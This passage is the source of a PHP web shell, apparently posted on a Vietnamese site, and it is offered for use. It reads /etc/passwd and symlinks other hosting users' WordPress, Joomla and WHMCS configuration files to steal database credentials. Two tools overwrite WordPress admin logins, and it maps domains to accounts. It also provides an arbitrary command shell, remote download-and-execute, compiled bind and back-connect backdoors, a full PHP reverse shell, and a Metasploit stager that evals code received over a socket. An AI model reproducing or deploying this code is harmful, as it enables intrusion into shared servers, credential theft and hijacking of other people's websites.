 else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
 while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
 $msg .= "<tr><td><a href='?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
 @mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
 <br><center><div class="mybox"><h2 class="k2ll33d2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $pwd;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connection Form</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></div></center>
 <?php }}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'configs')) {?><br><br><center><div class='mybox'><?php if (empty($_POST['conf'])) { ?><h2 class='k2ll33d2'>Configs Grabber</h2><br><p>/etc/passwd content</p><form method="POST"><textarea name="passwd" class='output' rows=20><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="conf" class='inputzbut' size="80" value="GET'em" type="submit"><br></form></div></center><?php }if ($_POST['conf']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink is disabled :( </error>');}@mkdir('configs', 0755);@chdir('configs');$htaccess="
 Options all
 Options +Indexes
 Options +FollowSymLinks
 DirectoryIndex Sux.html
 AddType text/plain .php
 AddHandler server-parsed .php
 AddType text/plain .html
 AddHandler txt .html
 Require None
 Satisfy Any
 ";file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("\n",$passwd);echo "<center class='k2ll33d2'>wait ...<center>";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'-wp13-wordpress-beta.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'-wp-protal.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo 'Done -> <a href="configs">configs</a>';}}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'config')){ error_reporting(0);if ($_POST['kill']) {$url = $_POST['url'];$user = $_POST['user'];$pass =$_POST['pass'];$pss = md5($pass);function enter($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}$config = file_get_contents($url);$password = enter($config,"define('DB_PASSWORD', '","');");$username = enter($config,"define('DB_USER', '","');");$db = enter($config,"define('DB_NAME', '","');");$prefix = enter($config,'$table_prefix = \'',"';");$host = enter($config,"define('DB_HOST', '","');");if($config && preg_match('/DB_NAME/i',$config)){$conn= @mysql_connect($host,$username ,$password ) or die ("i can't connect to mysql, check your data");@mysql_select_db($db,$conn) or die (mysql_error());$grab = @mysql_query("SELECT * from `wp_options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url = $data["option_value"];$query = mysql_query("UPDATE `".$prefix."users` SET `user_login` = '".$user."',`user_pass` = '".$pss."' WHERE `ID` = 1");if ($query) {echo '<center><h2 class="k2ll33d2">Done !</h2></center><br><table width="100%"><tr><th width="20%">site</th><th width="20%">user</th><th with="20%">password</th><th width="20%">link</th></tr><tr><td width="20%"><font size="2" color="red">'.$site_url.'</font></td><td width="20%">'.$user.'</td><td with="20%">'.$pass.'</td><td width="20%"><a href="'.$site_url.'/wp-login.php"><font color="#00ff00">login</font></td></tr></table>';} else echo '<h2 class="k2ll33d2"><font color="#ff0000">ERROR !</font></h2>';} else die('<h2 class="k2ll33d2">Not a wordpress config</h2>');} else { ?> <center><br><br><div class="mybox"><form method="post"><h2 style='font-size:26px;' class='k2ll33d2'>Wordpress login changer ( symlink version )</h2><br><table><tr><td>config link&nbsp;:&nbsp;</td><td><input size="26" class="inputz" type="text" name="url" value=""></td></tr><tr><td>new user&nbsp;:&nbsp;</td><td><input class="inputz" type="text" name="user" size="26" value="admin"></td></tr><tr><td>new password&nbsp;:&nbsp;</td><td><input class="inputz" type="text" size="26" name="pass" value="123123"></td></tr><tr><td><br></td></tr><tr><td><input class="inputzbut" type="submit" name="kill" value=" change "></td><br></tr></table></form></div></center><?php }}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'domains')){echo "<br><br><center><div class='mybox'><p align='center' class='k2ll33d2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : i can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'keyboard')){if(empty($_POST['pwd'])){echo "<br><br><center><div class='mybox'><h2 style='font-size:40px;' class='k2ll33d2'>Wordpress login changer</h2><FORM method='POST'>DB_Prefix : <INPUT class ='inputz' size='8' value='wp_' name='prefix' type='text'>&nbsp;&nbsp;host : <INPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'>&nbsp;&nbsp;database : <INPUT class ='inputz' size='10' value='Database' name='database' type='text'>&nbsp;&nbsp;username : <INPUT class ='inputz' size='10' value='db_user' name='username' type='text'>&nbsp;&nbsp;password : <INPUT class ='inputz' size='10' value='db_pass' name='password' type='text'>&nbsp;&nbsp;<br><br>New username : <INPUT class ='inputz' name='admin' size='15' value='k2'><br><br>New password : <INPUT class ='inputz' name='pwd' size='15' value='123123'><br>&nbsp;&nbsp;<br><INPUT class='inputzbut' value='change' name='send' type='submit'></FORM></div/></center>";}else{$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database= $_POST['database'];$username= $_POST['username'];$password= $_POST['password'];$pwd= $_POST['pwd'];$admin= $_POST['admin'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$hash = crypt($pwd);$grab = @mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url=$data["option_value"];$k2=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());$k2=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());if($k2){echo '<br><br><center><h1>Done ... -> <a href="'.$site_url.'/wp-login.php" target="_blank">Login</a></h1></center>';}}echo '</center>';}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){$text = $_POST['code'];?><center><br><br><div class="mybox"><h2 class="k2ll33d2">String encoder</h2><form method="post"><br><textarea class='inputz' cols=80 rows=5 name="code">k2ll33d</textarea><br><br><select class='inputz' size="1" name="ope"><option value="base64">Base64</option><option value="md5">md5</option><option value="whash">Crypt</option><option value="SHA1">SHA1</option><option value="urlencode">URL Encoding</option><option value="md4">md4</option><option value="SHA256">SHA256</option></select>&nbsp;<input class='inputzbut' type='submit' value='encrypt'></form><?php $op = $_POST["ope"];switch ($op) {case 'base64': $codi=base64_encode($text);break;case 'md5' : $codi=md5($text);break;case 'whash' : $codi=crypt($text);break;case 'SHA1' : $codi=sha1($text);break;case 'urlencode' : $codi=urlencode($text);break;case 'md4' : $codi=hash("md4",$text);break;case 'SHA256' : $codi=hash("sha256",$text);break;default:break;}echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></div></center>';}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div>";}
 elseif(isset($_GET['view']) && ($_GET['view'] != "")){if(is_file($_GET['view'])){if(!isset($file))$file = magicboom($_GET['view']);if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name['name']."<span class='gaya'> : </span>".$group['name'];} else {$owner = $user;}$filn = basename($file);echo "<table style='margin:6px 0 0 2px;line-height:20px;'> <tr><td>Filename</td><td><span id='".clearspace($filn)."_link'>".$file."</span> <form action='?y=".$pwd."&amp;view=$file' method='post' id='".clearspace($filn)."_form' class='sembunyi' style='margin:0;padding:0;'> <input type='hidden' name='oldname' value='".$filn."' style='margin:0;padding:0;' /> <input class='inputz' style='width:200px;' type='text' name='newname' value='".$filn."' /> <input class='inputzbut' type='submit' name='rename' value='rename' /> <input class='inputzbut' type='submit' name='cancel' value='cancel' onclick='tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');' /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href='?y=$pwd&amp;edit=$file'>edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href='?y=$pwd&amp;delete=$file'>delete</a> | <a href='?y=$pwd&amp;dl=$file'>download</a>&nbsp;(<a href='?y=$pwd&amp;dlgzip=$file'>gzip</a>)</td></tr> <tr><td>View</td><td><a href='?y=".$pwd."&amp;view=".$file."'>text</a> | <a href='?y=".$pwd."&amp;view=".$file."&amp;type=code'>code</a> | <a href='?y=".$pwd."&amp;view=".$file."&amp;type=image'>image</a></td></tr></table>";
 if(isset($_GET['type']) && ($_GET['type']=='image')){echo "<div style='text-align:center;margin:8px;'><img src='?y=".$pwd."&amp;img=".$filn."'></div>";}
 elseif(isset($_GET['type']) && ($_GET['type']=='code')){echo "<div class='viewfile'>";$file = wordwrap(@file_get_contents($file),"240","\n");@highlight_string($file);echo "</div>";} else {echo "<div class='viewfile'>";echo nl2br(htmlentities((@file_get_contents($file))));echo "</div>";}}elseif(is_dir($_GET['view'])){echo showdir($pwd,$prompt);}}
 elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){if(isset($_POST['save'])){$file = $_POST['saveas'];$content = magicboom($_POST['content']);if($filez = @fopen($file,"w")){$time = date("d-M-Y H:i",time());if(@fwrite($filez,$content)) $msg = "file saved <span class='gaya'>@</span> ".$time;else $msg = "failed to save";@fclose($filez);}else $msg = "permission denied";}if(!isset($file))$file = $_GET['edit'];if($filez = @fopen($file,"r")){$content = "";
 while(!feof($filez)){$content .= htmlentities(str_replace("''","'",fgets($filez)));}
 @fclose($filez);}?><form action="?y=<?php echo $pwd;?>&amp;edit=<?php echo $file;?>" method="post"> <table class="cmdbox"> <tr><td colspan="2">
 <textarea class="output" name="content">
 <?php echo $content;?></textarea> <tr>
 <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file;?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg;?></td></tr></table></form> <?php }
 elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){if(isset($_POST['uploadcomp'])){if(is_uploaded_file($_FILES['file']['tmp_name'])){$path = magicboom($_POST['path']);$fname = $_FILES['file']['name'];$tmp_name = $_FILES['file']['tmp_name'];$pindah = $path.$fname;$stat = @move_uploaded_file($tmp_name,$pindah);if ($stat) {$msg = "file uploaded to $pindah";} else $msg = "failed to upload $fname";}else $msg = "failed to upload $fname";}
 elseif(isset($_POST['uploadurl'])){$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$path = magicboom($_POST['path']);$namafile = download($pilihan,$wurl);$pindah = $path.$namafile;if(is_file($pindah)){$msg = "file uploaded to $pindah";}else $msg ="failed to upload $namafile";}?><br><br><center><div class="mybox"><form action="?y=<?php echo $pwd;?>&amp;x=upload" enctype="multipart/form-data" method="post"><h1 class="k2ll33d2">Upload Files To The Server</h1><table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Local</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" />&nbsp;<input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd;?>" /></td></tr> </tr> </table></form><br><table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Remote</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd;?>&amp;x=upload"> <table><tr><td>link</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://site/file.*"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd;?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg;?></div></div></center>
 <?php }
 elseif(isset($_GET['x']) && ($_GET['x'] == 'back')){
 if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {$port = trim($_POST['port']);$passwrd = trim($_POST['bind_pass']);tulis("bdc.c",$port_bind_bd_c);exe("gcc -o bdc bdc.c");exe("chmod 777 bdc");@unlink("bdc.c");exe("./bdc ".$port." ".$passwrd." &");$scan = exe("ps aux");if(eregi("./bdc $por",$scan)){$msg = "<p>Process successed</p>";} else {$msg = "<p>Process Failed</p>";}}
 elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {$port = trim($_POST['port']);$passwrd = trim($_POST['bind_pass']);tulis("bdp",$port_bind_bd_pl);exe("chmod 777 bdp");$p2=which("perl");exe($p2." bdp ".$port." &");$scan = exe("ps aux");if(eregi("$p2 bdp $port",$scan)){$msg = "<p>Process successed</p>";} else {$msg = "<p>Process Failed</p>";} }
 elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {$ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcc.c",$back_connect_c);exe("gcc -o bcc bcc.c");exe("chmod 777 bcc");@unlink("bcc.c");exe("./bcc ".$ip." ".$port." &");$msg = "trying to connect to ".$ip." on port ".$port." ...";}
 elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
 $ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcp",$back_connect);
 exe("chmod +x bcp");$p2=which("perl");exe($p2." bcp ".$ip." ".$port." &");
 $msg = "Trying to connect to ".$ip." on port ".$port." ...";}
 elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$namafile = download($pilihan,$wurl);
 if(is_file($namafile)){$msg = exe($wcmd);}
 else $msg = "error: file not found $namafile";}?><br><br><br><br> <table class="tabnet"> <tr><th>Bind Port</th><th>Back connect</th><th>download and Exec</th></tr><tr><td> <table> <form method="post" actions="?y=<?php echo $pwd;?>&amp;x=back"><tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass;?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form></table> </td> <td><table> <form method="post" actions="?y=<?php echo $pwd;?>&amp;x=back"><tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport;?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form></table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd;?>&amp;x=back"><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr><tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option><option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td></tr></table><div style="text-align:center;margin:2px;"><?php echo $msg;?></div><br>
 <?php
 error_reporting(0);
 function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
 $s_my_ip = $_SERVER['REMOTE_ADDR'];$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<center><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&amp;x='back'><table class='myboxtbl'><tr><td style='width:100px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td></div><br><div class='mybox'><td><form method='POST'><table class='myboxtbl'><h2>Metasploit Connection </h2><tr><td style='width:100px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center>";
 echo $s_result;
 if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
 if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
 if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
 if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
 if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
 umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
 $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
 $process = proc_open($shell, $descriptorspec, $pipes);
 if(!is_resource($process)) exit(1);
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
 stream_set_blocking($pipes[2], 0);
 stream_set_blocking($sock, 0);
 while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
 if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
 if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}} elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){?>
 <form action="?y=<?php echo $pwd;?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2">
 <textarea class="output" readonly>
 <?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
 </textarea> <tr><td colspan="2"><?php echo $prompt;?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
 <?php }else{if(isset($_GET['delete']) && ($_GET['delete'] != "")){$file = $_GET['delete'];@unlink($file);}
 elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));}
 elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){$path = $pwd.$_GET['mkdir'];@mkdir($path);}$buff = showdir($pwd,$prompt);echo $buff;}
 ?></div></body></html>
  

 

Đánh giá: 
1
Trung bình: 1 (1 vote)